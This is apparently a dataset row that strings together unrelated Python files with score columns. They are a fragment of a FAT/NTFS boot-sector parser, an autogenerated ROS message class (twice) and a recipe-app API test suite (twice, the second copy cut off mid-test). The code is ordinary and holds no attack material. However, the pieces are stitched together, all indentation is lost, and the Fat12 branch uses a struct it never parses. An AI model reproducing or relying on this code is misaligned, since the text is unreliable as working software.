partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_number_fat
partition.fat32DriveVersion = self.bootSectorStruct.fat32_drive_version
partition.sectorNumberFsInformation = self.bootSectorStruct.sector_number_fs_information
partition.sectorsNumberPartition = self.bootSectorStruct.sectors_number_partition
partition.sectorNumberBackupBoot = self.bootSectorStruct.sector_number_backup_boot
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat16":
self.bootSectorStruct = self.fat16BootSector.parse(cap1)
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.maximumRootEntryDirectories = self.bootSectorStruct.maximum_root_entry_directories
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.sectorsNumberFat = self.bootSectorStruct.sectors_per_fat
partition.sectorNumberPartition = self.bootSectorStruct.sector_number_partition
partition.serialNumberPartition = self.bootSectorStruct.serial_number_partition
partition.fatName = self.bootSectorStruct.fat_name
elif type == "Fat12":
partition.sectorPerCluster = self.bootSectorStruct.sectors_per_cluster
partition.bytesPerSector = self.bootSectorStruct.bytesPerSector
partition.numberOfHeads = self.bootSectorStruct.number_of_head
partition.sectorsPerTrack = self.bootSectorStruct.sectorsPerTrack
partition.possibleRootEntryNumber = self.bootSectorStruct.possible_root_entry_number
partition.numberOfSectorsSmaller32mb = self.bootSectorStruct.number_of_sectors_smaller_32mb
partition.fatName = self.bootSectorStruct.fs_type
return partition
except Exception as inst:
self.logger.error("Error : ", inst)
def save_boot_sector(self, image):
try:
file_image = open(image, "rb")
file_boot = open(self.path + os.path.sep + "boot sector", "w")
file_boot.write(hexdump.hexdump(file_image.read(512), "return"))
file_image.close()
file_boot.close()
except Exception as inst:
self.logger.error("Extracting mbr failed")
return file_boot.name
def extract_hexa(self, boot_sector):
try:
h_file = open(boot_sector, "rb")
hex_str = ""
for line in h_file.readlines():
hex_str += line[10:58]
for i in hex_str.split(" "):
self.hexaBootSector += i
h_file.close()
except Exception as inst:
self.logger.error("Error Extract Hexadecimal of bootSector")
def __str__(self):
output = ""
if self.type == "NTFS":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(self.size) + "\nTotal sectors : " + str(
self.totalSectors)
output += "\nBytes per sector : " + str(self.bytesPerSector) + "\nSectors per cluster : " + str(
self.sectorPerCluster)
output += "\nSectors per track : " + str(
self.sectorsPerTrack) # + "\nReserved sectors : " + str(self.reservedSectors)
output += "\nHidden sectors : " + str(self.hiddenSectors) + "\nNumber of heads : " + str(self.numberOfHeads)
output += "\nLogical cluster number of MFT : " + str(
self.mftLogicalClusterNumber) + "\nLogical cluster number of MFTMIRR : " + str(
self.mftmirrLogicalClusterNumber)
output += "\nClusters per file record segment : " + str(
self.clusterPerFileRecordSegment) + "\nVolume serial number : " + str(self.volumeSerialNumber) + "\n"
elif self.type == "Fat32":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nVersion of FAT32 drive : " + str(self.fat32DriveVersion)
output += "\nSector number of the FileSystem information sector : " + str(self.sectorNumberFsInformation)
output += "\nSector number of the backupboot sector : " + str(
self.sectorNumberBackupBoot) + "\nSerial number of partition : " + str(
self.serialNumberPartition) + "\n"
elif self.type == "Fat16":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nMaximum root entry directories :" + str(
self.maximumRootEntryDirectories)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(self.numberOfSectorsSmaller32mb)
output += "\nNumber of sectors per FAT : " + str(
self.sectorsNumberFat) + "\nNumber of sectors in partition : " + str(self.sectorNumberPartition)
output += "\nSerial number of partition : " + str(self.serialNumberPartition) + "\nFat name : " + str(
self.fatName) + "\n"
elif self.type == "Fat12":
output += "\nDisk :" + self.disk + "\nPartition name :" + self.partName + "\nType :" + self.type
output += "\nBlock size :" + str(self.blockSize) + "\nSize :" + str(
self.size) + "\nBytes per sector : " + str(self.bytesPerSector)
output += "\nSectors per cluster : " + str(self.sectorPerCluster) + "\nNumber of heads : " + str(
self.numberOfHeads)
output += "\nSectors per track : " + str(self.sectorsPerTrack) + "\nPossible root entry number :" + str(
self.possibleRootEntryNumber)
output += "\nNumber of sectors in partition smaller than 32 mb : " + str(
self.numberOfSectorsSmaller32mb) + "\nFat name : " + str(self.fatName) + "\n"
return output | 0.538255 | 0.070176 |
"""autogenerated by genpy from sbg_driver/SbgStatusGeneral.msg. Do not edit."""
import codecs
import sys
# True when running under Python 3 (sys.hexversion for 3.0.0 starts at
# 0x03000000). The comparison already yields a bool, so the original
# "True if ... else False" wrapper was redundant.
python3 = sys.hexversion > 0x03000000
import genpy
import struct
class SbgStatusGeneral(genpy.Message):
_md5sum = "693fdf7e799b5fc52833d1649c048053"
_type = "sbg_driver/SbgStatusGeneral"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# SBG Ellipse Messages
# SbgStatus submessage
# General main power
# True when main power supply is OK.
bool main_power
# General imu power
# True when IMU power supply is OK.
bool imu_power
# General gps power
# Set to True when GPS power supply is OK.
bool gps_power
# General Settings
# True if settings were correctly loaded
bool settings
# General Temperature
# True when temperature is within specified limits.
bool temperature"""
__slots__ = ['main_power','imu_power','gps_power','settings','temperature']
_slot_types = ['bool','bool','bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
main_power,imu_power,gps_power,settings,temperature
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SbgStatusGeneral, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.main_power is None:
self.main_power = False
if self.imu_power is None:
self.imu_power = False
if self.gps_power is None:
self.gps_power = False
if self.settings is None:
self.settings = False
if self.temperature is None:
self.temperature = False
else:
self.main_power = False
self.imu_power = False
self.gps_power = False
self.settings = False
self.temperature = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B = None
def _get_struct_5B():
global _struct_5B
if _struct_5B is None:
_struct_5B = struct.Struct("<5B")
return _struct_5B | bagpy-sbg/sbg_genpy/_SbgStatusGeneral.py | """autogenerated by genpy from sbg_driver/SbgStatusGeneral.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SbgStatusGeneral(genpy.Message):
_md5sum = "693fdf7e799b5fc52833d1649c048053"
_type = "sbg_driver/SbgStatusGeneral"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# SBG Ellipse Messages
# SbgStatus submessage
# General main power
# True when main power supply is OK.
bool main_power
# General imu power
# True when IMU power supply is OK.
bool imu_power
# General gps power
# Set to True when GPS power supply is OK.
bool gps_power
# General Settings
# True if settings were correctly loaded
bool settings
# General Temperature
# True when temperature is within specified limits.
bool temperature"""
__slots__ = ['main_power','imu_power','gps_power','settings','temperature']
_slot_types = ['bool','bool','bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
main_power,imu_power,gps_power,settings,temperature
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SbgStatusGeneral, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.main_power is None:
self.main_power = False
if self.imu_power is None:
self.imu_power = False
if self.gps_power is None:
self.gps_power = False
if self.settings is None:
self.settings = False
if self.temperature is None:
self.temperature = False
else:
self.main_power = False
self.imu_power = False
self.gps_power = False
self.settings = False
self.temperature = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_5B().pack(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 5
(_x.main_power, _x.imu_power, _x.gps_power, _x.settings, _x.temperature,) = _get_struct_5B().unpack(str[start:end])
self.main_power = bool(self.main_power)
self.imu_power = bool(self.imu_power)
self.gps_power = bool(self.gps_power)
self.settings = bool(self.settings)
self.temperature = bool(self.temperature)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_5B = None
def _get_struct_5B():
global _struct_5B
if _struct_5B is None:
_struct_5B = struct.Struct("<5B")
return _struct_5B | 0.513181 | 0.198316 |
import unittest
import requests
use_production = False
URL = 'https://sharecipe-backend.herokuapp.com' if use_production else 'http://127.0.0.1:5000'
class Account:
def __init__(self, username, password, user_id, access_token, refresh_token):
self.username = username
self.password = password
self.user_id = user_id
self.access_token = access_token
self.refresh_token = refresh_token
def delete(self):
header = {'Authorization': f'Bearer {self.refresh_token}'}
payload = {'user_id': self.user_id, 'password': self.password}
response = requests.delete(f'{URL}/account/delete', headers=header, json=payload)
@classmethod
def add(cls, username, password, bio=None):
payload = {'username': username, 'password': password, 'bio': bio}
response = requests.post(f'{URL}/account/register', json=payload)
return cls(username=username, password=password, **response.json())
class TestAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Create user accounts
cls.user1 = Account.add('testing123', '123456', 'A human!')
cls.user2 = Account.add('testing456', '123456')
cls.user3 = Account.add('admin123', '123456')
@classmethod
def tearDownClass(cls):
# Delete the test accounts
cls.user1.delete()
cls.user2.delete()
cls.user3.delete()
def test_all(self):
user1 = self.user1
user2 = self.user2
user3 = self.user3
# Hello world
response = requests.get(f'{URL}/hello')
data = response.json()
self.assertDictEqual(data, {'hello': 'world'})
# User login
payload = {'username': 'testing123', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
data = response.json()
self.assertEqual(user1.user_id, data.get('user_id'))
# # Search users
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users', headers=header)
# data = response.json()
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None},
# {'user_id': user3.user_id, 'username': 'admin123', 'bio': None}
# ])
# # Search users with query
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users?username=test', headers=header)
# data = response.json()
# self.assertIsInstance(data, list)
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None}
# ])
# Get user data
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}', headers=header)
data = response.json()
self.assertIsInstance(data, dict)
self.matchDict(data, user_id=user2.user_id, username="testing456", bio=None)
# Update user data
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {'username': 'totallyNotAdmin', 'bio': 'Code. Create. Coordinate.'}
response = requests.patch(f'{URL}/users/{user1.user_id}', headers=header, json=payload)
data = response.json()
self.matchDict(data, user_id=user1.user_id, username="totallyNotAdmin", bio="Code. Create. Coordinate.")
# Change password
header = {'Authorization': f'Bearer {user2.refresh_token}'}
payload = {'old_password': '<PASSWORD>', 'new_password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/changepassword', headers=header, json=payload)
self.assertEqual(response.status_code, 204)
user2.password = '<PASSWORD>'
# Try login
payload = {'username': 'testing456', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
self.assertEqual(response.status_code, 200)
# Follow another user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user2.user_id}', headers=header)
# Follow a second user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Get user follows
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 2)
# Get user 1 followers
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 0)
# Get user 2 followers
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 1)
# Get follow state
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Create new recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {
'name': 'Edible food',
'description': 'Very tasting food',
'portion': 3,
'difficulty': 5,
'is_public': True,
'steps': [
{'step_number': 1, 'description': 'Add water.'},
{'step_number': 2, 'description': 'Add egg.'}
],
'ingredients': [
{'name': 'Egg', 'quantity': 10.0, 'unit': 'grams'},
{'name': 'Water', 'quantity': 5.0, 'unit': 'kg'}
],
'tags': [
{'name': 'edible'},
{'name': 'tasty'},
{'name': 'modern'}
]
}
response = requests.put(f'{URL}/recipes', headers=header, json=payload)
recipe_data = response.json()
self.matchDict(
recipe_data,
user_id=user3.user_id,
name="Edible food",
description='Very tasting food',
portion=3,
difficulty=5,
is_public=True
)
# Add a new review
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {
'rating': 4,
'comment': 'this is the best recipe!'
}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header, json=payload)
self.assertEqual(response.status_code, 201)
# Get reviews
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header)
review_data = response.json()
self.assertEqual(response.status_code, 200)
print(review_data)
# Get tag suggestions
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/recipes/tagsuggestions', headers=header)
data = response.json()
# Get all recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/recipes', headers=header)
data = response.json()
# Get recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
self.assertDictEqual(data, recipe_data)
# Update recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'name': 'Poison'}
response = requests.patch(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header, json=payload)
data = response.json()
self.assertEqual(data.get('name'), 'Poison')
# Add a recipe step
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'step_number': 3, 'description': 'Boil over stove.'}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.matchDict(data, recipe_id=recipe_data["recipe_id"], **payload)
# Get a recipe steps
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/steps', headers=header, json=payload)
data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data), 3)
# Add recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
test_images = []
with open('tests/test1.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test2.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
with open('tests/test3.png', 'rb') as image_file:
test_images.append(('images', image_file.read()))
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header, files=test_images)
# Get recipe images
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/images', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/recipe_images.zip', "wb") as file:
file.write(response.content)
# Get recipe data with icons stuff
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
# User like recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Another user like recipe
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.post(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user2.user_id}', headers=header)
self.assertEqual(response.status_code, 201)
# Get user likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 1)
# Get recipe likes
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 2)
# User unlike recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}/likes/{user1.user_id}', headers=header)
self.assertEqual(response.status_code, 204)
# User doesn't have likes
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/recipes/likes', headers=header)
like_data = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(len(like_data), 0)
# Get user stats
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/stats', headers=header)
print(response.json())
self.assertEqual(response.status_code, 200)
# Get the amazing discover page
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/discover', headers=header)
discover_data = response.json()
print(discover_data)
# Delete recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.delete(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 204)
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
self.assertEqual(response.status_code, 404)
# Upload profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
with open('tests/test0.png', 'rb') as image_file:
test_image = {'image': image_file.read()}
response = requests.put(f'{URL}/users/{user2.user_id}/profileimage', headers=header, files=test_image)
self.assertEqual(response.status_code, 200)
# Download profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
with open('tests/downloaded_test.png', "wb") as file:
file.write(response.content)
# Delete profile image
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.delete(f'{URL}/users/{user2.user_id}/profileimage', headers=header)
self.assertEqual(response.status_code, 200)
def matchDict(self, actual, **expected):
for key, value in expected.items():
self.assertEqual(actual.get(key), value)
if __name__ == '__main__':
unittest.main() | tests/test.py | import unittest
import requests
use_production = False
URL = 'https://sharecipe-backend.herokuapp.com' if use_production else 'http://127.0.0.1:5000'
class Account:
def __init__(self, username, password, user_id, access_token, refresh_token):
self.username = username
self.password = password
self.user_id = user_id
self.access_token = access_token
self.refresh_token = refresh_token
def delete(self):
header = {'Authorization': f'Bearer {self.refresh_token}'}
payload = {'user_id': self.user_id, 'password': self.password}
response = requests.delete(f'{URL}/account/delete', headers=header, json=payload)
@classmethod
def add(cls, username, password, bio=None):
payload = {'username': username, 'password': password, 'bio': bio}
response = requests.post(f'{URL}/account/register', json=payload)
return cls(username=username, password=password, **response.json())
class TestAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Create user accounts
cls.user1 = Account.add('testing123', '123456', 'A human!')
cls.user2 = Account.add('testing456', '123456')
cls.user3 = Account.add('admin123', '123456')
@classmethod
def tearDownClass(cls):
# Delete the test accounts
cls.user1.delete()
cls.user2.delete()
cls.user3.delete()
def test_all(self):
user1 = self.user1
user2 = self.user2
user3 = self.user3
# Hello world
response = requests.get(f'{URL}/hello')
data = response.json()
self.assertDictEqual(data, {'hello': 'world'})
# User login
payload = {'username': 'testing123', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
data = response.json()
self.assertEqual(user1.user_id, data.get('user_id'))
# # Search users
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users', headers=header)
# data = response.json()
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None},
# {'user_id': user3.user_id, 'username': 'admin123', 'bio': None}
# ])
# # Search users with query
# header = {'Authorization': f'Bearer {user1.access_token}'}
# response = requests.get(f'{URL}/users?username=test', headers=header)
# data = response.json()
# self.assertIsInstance(data, list)
# self.assertListEqual(data, [
# {'user_id': user1.user_id, 'username': 'testing123', 'bio': 'A human!'},
# {'user_id': user2.user_id, 'username': 'testing456', 'bio': None}
# ])
# Get user data
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}', headers=header)
data = response.json()
self.assertIsInstance(data, dict)
self.matchDict(data, user_id=user2.user_id, username="testing456", bio=None)
# Update user data
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {'username': 'totallyNotAdmin', 'bio': 'Code. Create. Coordinate.'}
response = requests.patch(f'{URL}/users/{user1.user_id}', headers=header, json=payload)
data = response.json()
self.matchDict(data, user_id=user1.user_id, username="totallyNotAdmin", bio="Code. Create. Coordinate.")
# Change password
header = {'Authorization': f'Bearer {user2.refresh_token}'}
payload = {'old_password': '<PASSWORD>', 'new_password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/changepassword', headers=header, json=payload)
self.assertEqual(response.status_code, 204)
user2.password = '<PASSWORD>'
# Try login
payload = {'username': 'testing456', 'password': '<PASSWORD>'}
response = requests.post(f'{URL}/account/login', json=payload)
self.assertEqual(response.status_code, 200)
# Follow another user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user2.user_id}', headers=header)
# Follow a second user
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.post(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Get user follows
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 2)
# Get user 1 followers
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 0)
# Get user 2 followers
header = {'Authorization': f'Bearer {user2.access_token}'}
response = requests.get(f'{URL}/users/{user2.user_id}/followers', headers=header)
follows_data = response.json()
self.assertEqual(len(follows_data), 1)
# Get follow state
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user1.user_id}/follows/{user3.user_id}', headers=header)
# Create new recipe
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {
'name': 'Edible food',
'description': 'Very tasting food',
'portion': 3,
'difficulty': 5,
'is_public': True,
'steps': [
{'step_number': 1, 'description': 'Add water.'},
{'step_number': 2, 'description': 'Add egg.'}
],
'ingredients': [
{'name': 'Egg', 'quantity': 10.0, 'unit': 'grams'},
{'name': 'Water', 'quantity': 5.0, 'unit': 'kg'}
],
'tags': [
{'name': 'edible'},
{'name': 'tasty'},
{'name': 'modern'}
]
}
response = requests.put(f'{URL}/recipes', headers=header, json=payload)
recipe_data = response.json()
self.matchDict(
recipe_data,
user_id=user3.user_id,
name="Edible food",
description='Very tasting food',
portion=3,
difficulty=5,
is_public=True
)
# Add a new review
header = {'Authorization': f'Bearer {user1.access_token}'}
payload = {
'rating': 4,
'comment': 'this is the best recipe!'
}
response = requests.put(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header, json=payload)
self.assertEqual(response.status_code, 201)
# Get reviews
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}/reviews', headers=header)
review_data = response.json()
self.assertEqual(response.status_code, 200)
print(review_data)
# Get tag suggestions
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/recipes/tagsuggestions', headers=header)
data = response.json()
# Get all recipe
header = {'Authorization': f'Bearer {user1.access_token}'}
response = requests.get(f'{URL}/users/{user3.user_id}/recipes', headers=header)
data = response.json()
# Get recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
response = requests.get(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header)
data = response.json()
self.assertDictEqual(data, recipe_data)
# Update recipe data
header = {'Authorization': f'Bearer {user3.access_token}'}
payload = {'name': 'Poison'}
response = requests.patch(f'{URL}/recipes/{recipe_data["recipe_id"]}', headers=header, json=payload)
data = response.json()
self.assertEqual(data.get('name'), 'Poison')
# Add a recipe step
